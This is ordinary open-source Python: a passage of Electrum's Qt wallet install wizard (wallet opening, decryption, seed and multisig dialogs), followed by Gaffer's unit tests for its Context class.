outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Needed for Qt on macOS. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
else:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
# FIXME if we get here because of mistyped passphrase
# then that passphrase gets "cached"
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet()
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(msg)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=()):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMaximumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
ContextTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import weakref
import imath
import IECore
import Gaffer
import GafferTest
class ContextTest( GafferTest.TestCase ) :
def testFrameAccess( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c["frame"], 1.0 )
c.setFrame( 10.5 )
self.assertEqual( c.getFrame(), 10.5 )
self.assertEqual( c["frame"], 10.5 )
def testChangedSignal( self ) :
c = Gaffer.Context()
changes = []
def f( context, name ) :
self.assertTrue( context.isSame( c ) )
changes.append( ( name, context.get( name, None ), context.hash() ) )
cn = c.changedSignal().connect( f )
c["a"] = 2
hash1 = c.hash()
self.assertEqual( changes, [ ( "a", 2, hash1 ) ] )
c["a"] = 3
hash2 = c.hash()
self.assertEqual( changes, [ ( "a", 2, hash1 ), ( "a", 3, hash2 ) ] )
c["b"] = 1
hash3 = c.hash()
self.assertEqual( changes, [ ( "a", 2, hash1 ), ( "a", 3, hash2 ), ( "b", 1, hash3 ) ] )
# when an assignment makes no actual change, the signal should not
# be triggered again.
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2, hash1 ), ( "a", 3, hash2 ), ( "b", 1, hash3 ) ] )
# Removing variables should also trigger the changed signal.
del changes[:]
c.remove( "a" )
hash4 = c.hash()
self.assertEqual( changes, [ ( "a", None, hash4 ) ] )
del c["b"]
hash5 = c.hash()
self.assertEqual( changes, [ ( "a", None, hash4 ), ( "b", None, hash5 ) ] )
def testTypes( self ) :
c = Gaffer.Context()
c["int"] = 1
self.assertEqual( c["int"], 1 )
self.assertEqual( c.get( "int" ), 1 )
c.set( "int", 2 )
self.assertEqual( c["int"], 2 )
self.assertIsInstance( c["int"], int )
c["float"] = 1.0
self.assertEqual( c["float"], 1.0 )
self.assertEqual( c.get( "float" ), 1.0 )
c.set( "float", 2.0 )
self.assertEqual( c["float"], 2.0 )
self.assertIsInstance( c["float"], float )
c["string"] = "hi"
self.assertEqual( c["string"], "hi" )
self.assertEqual( c.get( "string" ), "hi" )
c.set( "string", "bye" )
self.assertEqual( c["string"], "bye" )
self.assertIsInstance( c["string"], str )
c["v2i"] = imath.V2i( 1, 2 )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.assertEqual( c.get( "v2i" ), imath.V2i( 1, 2 ) )
c.set( "v2i", imath.V2i( 1, 2 ) )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.assertIsInstance( c["v2i"], imath.V2i )
c["v3i"] = imath.V3i( 1, 2, 3 )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.assertEqual( c.get( "v3i" ), imath.V3i( 1, 2, 3 ) )
c.set( "v3i", imath.V3i( 1, 2, 3 ) )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.assertIsInstance( c["v3i"], imath.V3i )
c["v2f"] = imath.V2f( 1, 2 )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.assertEqual( c.get( "v2f" ), imath.V2f( 1, 2 ) )
c.set( "v2f", imath.V2f( 1, 2 ) )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.assertIsInstance( c["v2f"], imath.V2f )
c["v3f"] = imath.V3f( 1, 2, 3 )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.assertEqual( c.get( "v3f" ), imath.V3f( 1, 2, 3 ) )
c.set( "v3f", imath.V3f( 1, 2, 3 ) )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.assertIsInstance( c["v3f"], imath.V3f )
def testSwitchTypes( self ) :
c = Gaffer.Context()
c["x"] = 1
self.assertEqual( c["x"], 1 )
self.assertEqual( c.get( "x" ), 1 )
c.set( "x", 2 )
self.assertEqual( c["x"], 2 )
self.assertIsInstance( c["x"], int )
c["x"] = 1.0
self.assertEqual( c["x"], 1.0 )
self.assertEqual( c.get( "x" ), 1.0 )
c.set( "x", 2.0 )
self.assertEqual( c["x"], 2.0 )
self.assertIsInstance( c["x"], float )
c["x"] = "hi"
self.assertEqual( c["x"], "hi" )
self.assertEqual( c.get( "x" ), "hi" )
c.set( "x", "bye" )
self.assertEqual( c["x"], "bye" )
self.assertIsInstance( c["x"], str )
c["x"] = imath.V2i( 1, 2 )
self.assertEqual( c["x"], imath.V2i( 1, 2 ) )
self.assertEqual( c.get( "x" ), imath.V2i( 1, 2 ) )
c.set( "x", imath.V2i( 1, 2 ) )
self.assertEqual( c["x"], imath.V2i( 1, 2 ) )
self.assertIsInstance( c["x"], imath.V2i )
c["x"] = imath.V3i( 1, 2, 3 )
self.assertEqual( c["x"], imath.V3i( 1, 2, 3 ) )
self.assertEqual( c.get( "x" ), imath.V3i( 1, 2, 3 ) )
c.set( "x", imath.V3i( 1, 2, 3 ) )
self.assertEqual( c["x"], imath.V3i( 1, 2, 3 ) )
self.assertIsInstance( c["x"], imath.V3i )
c["x"] = imath.V2f( 1, 2 )
self.assertEqual( c["x"], imath.V2f( 1, 2 ) )
self.assertEqual( c.get( "x" ), imath.V2f( 1, 2 ) )
c.set( "x", imath.V2f( 1, 2 ) )
self.assertEqual( c["x"], imath.V2f( 1, 2 ) )
self.assertIsInstance( c["x"], imath.V2f )
c["x"] = imath.V3f( 1, 2, 3 )
self.assertEqual( c["x"], imath.V3f( 1, 2, 3 ) )
self.assertEqual( c.get( "x" ), imath.V3f( 1, 2, 3 ) )
c.set( "x", imath.V3f( 1, 2, 3 ) )
self.assertEqual( c["x"], imath.V3f( 1, 2, 3 ) )
self.assertIsInstance( c["x"], imath.V3f )
def testCopying( self ) :
c = Gaffer.Context()
c["i"] = 10
c2 = Gaffer.Context( c )
self.assertEqual( c2["i"], 10 )
c["i"] = 1
self.assertEqual( c["i"], 1 )
self.assertEqual( c2["i"], 10 )
def testEquality( self ) :
c = Gaffer.Context()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
self.assertFalse( c != c2 )
c["somethingElse"] = 1
self.assertNotEqual( c, c2 )
self.assertFalse( c == c2 )
def testCurrent( self ) :
# if nothing has been made current then there should be a default
# constructed context in place.
c = Gaffer.Context.current()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
# and we should be able to change that using the with statement
c2["something"] = 1
with c2 :
self.assertTrue( Gaffer.Context.current().isSame( c2 ) )
self.assertEqual( Gaffer.Context.current()["something"], 1 )
# and bounce back to the original
self.assertTrue( Gaffer.Context.current().isSame( c ) )
def testCurrentIsThreadSpecific( self ) :
c = Gaffer.Context()
self.assertFalse( c.isSame( Gaffer.Context.current() ) )
def f() :
self.assertFalse( c.isSame( Gaffer.Context.current() ) )
with Gaffer.Context() :
pass
with c :
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
t = threading.Thread( target = f )
t.start()
t.join()
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
self.assertFalse( c.isSame( Gaffer.Context.current() ) )
def testThreading( self ) :
# for good measure, run testCurrent() in a load of threads at
# the same time.
threads = []
for i in range( 0, 1000 ) :
t = threading.Thread( target = self.testCurrent )
t.start()
threads.append( t )
for t in threads :
t.join()
def testSetWithObject( self ) :
c = Gaffer.Context()
v = IECore.StringVectorData( [ "a", "b", "c" ] )
c.set( "v", v )
self.assertEqual( c.get( "v" ), v )
self.assertFalse( c.get( "v" ).isSame( v ) )
self.assertEqual( c["v"], v )
self.assertFalse( c["v"].isSame( v ) )
def testGetFallbackValue( self ) :
c = Gaffer.Context()
self.assertEqual( c.get( "f" ), None )
self.assertEqual( c.get( "f", 10 ), 10 )
c["f"] = 1.0
self.assertEqual( c.get( "f" ), 1.0 )
def testReentrancy( self ) :
c = Gaffer.Context()
with c :
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
with c :
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
def testLifeTime( self ) :
c = Gaffer.Context()
w = weakref.ref( c )
self.assertTrue( w() is c )
with c :
pass
del c
self.assertIsNone( w() )
def testWithBlockReturnValue( self ) :
with Gaffer.Context() as c :
self.assertIsInstance( c, Gaffer.Context )
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
def testSubstitute( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "$a/$b/something.###.tif" ), "apple/bear/something.020.tif" )
self.assertEqual( c.substitute( "$a/$dontExist/something.###.tif" ), "apple//something.020.tif" )
self.assertEqual( c.substitute( "${badlyFormed" ), "" )
def testSubstituteTildeInMiddle( self ) :
c = Gaffer.Context()
self.assertEqual( c.substitute( "a~b" ), "a~b" )
def testSubstituteWithMask( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "~", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.TildeSubstitutions ), "~" )
self.assertEqual( c.substitute( "#", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.FrameSubstitutions ), "#" )
self.assertEqual( c.substitute( "$a/${b}", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.VariableSubstitutions ), "$a/${b}" )
self.assertEqual( c.substitute( "\\", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.EscapeSubstitutions ), "\\" )
self.assertEqual( c.substitute( "\\$a", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.EscapeSubstitutions ), "\\apple" )
self.assertEqual( c.substitute( "#${a}", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.FrameSubstitutions ), "#apple" )
self.assertEqual( c.substitute( "#${a}", IECore.StringAlgo.Substitutions.NoSubstitutions ), "#${a}" )
def testFrameAndVariableSubstitutionsAreDifferent( self ) :
c = Gaffer.Context()
c.setFrame( 3 )
# Turning off variable substitutions should have no effect on '#' substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.VariableSubstitutions ), "003.$frame" )
# Turning off '#' substitutions should have no effect on variable substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.FrameSubstitutions ), "###.3" )
def testInternedStringVectorDataSubstitutions( self ) :
c = Gaffer.Context()
c["test1"] = IECore.InternedStringVectorData( [ "a", "b" ] )
c["test2"] = IECore.InternedStringVectorData()
self.assertEqual( c.substitute( "${test1}" ), "/a/b" )
self.assertEqual( c.substitute( "${test2}" ), "/" )
def testNames( self ) :
c = Gaffer.Context()
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond" ] ) )
c["a"] = 10
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc = Gaffer.Context( c )
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc["b"] = 20
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a", "b" ] ) )
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
self.assertEqual( cc.names(), cc.keys() )
@GafferTest.TestRunner.PerformanceTestMethod()
def testManyContexts( self ) :
GafferTest.testManyContexts()
def testGetWithAndWithoutCopying( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
# we should be getting a copy each time by default
self.assertFalse( c["test"].isSame( c["test"] ) )
# meaning that if we modify the returned value, no harm is done
c["test"].append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2 ] ) )
# if we ask nicely, we can get a reference to the internal
# value without any copying.
self.assertTrue( c.get( "test", _copy=False ).isSame( c.get( "test", _copy=False ) ) )
# but then if we modify the returned value, we are changing the
# context itself too. this should be avoided - we're just doing it
# here to test that we are indeed referencing the internal value.
c.get( "test", _copy=False ).append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2, 10 ] ) )
# Since we're doing an evil thing that should never be done, flag it before destruct
# so it doesn't get flagged as a corrupt context when the validator runs in debug mode
c.changed( "test" )
def testGetWithDefaultAndCopyArgs( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
self.assertTrue( c.get( "test", 10, _copy=False ).isSame( c.get( "test", 20, _copy=False ) ) )
self.assertTrue( c.get( "test", defaultValue=10, _copy=False ).isSame( c.get( "test", defaultValue=20, _copy=False ) ) )
def testCopyWithSharedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# both contexts reference the same object, but c2 at least owns
# a reference to its values, and can be used after c1 has been
# deleted.
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r + 1 )
del c1
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
# Tell c2 it's been invalidated, or else it could be flagged as a corrupt context when the validator
# runs in debug mode
c2.changed( "testInt" )
def testCopyWithBorrowedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# check that c2 doesn't own a reference
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
# Tell c2 it's been invalidated, or else it could be flagged as a corrupt context when the validator
# runs in debug mode
c2.changed( "testInt" )
# make sure we delete c2 before we delete c1
del c2
# check that we're ok to access c1 after deleting c2
self.assertEqual( c1["testInt"], 20 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
def testSetOnBorrowedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
# c2 must be destroyed first, since it depends on c1
del c2
def testSetOnSharedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
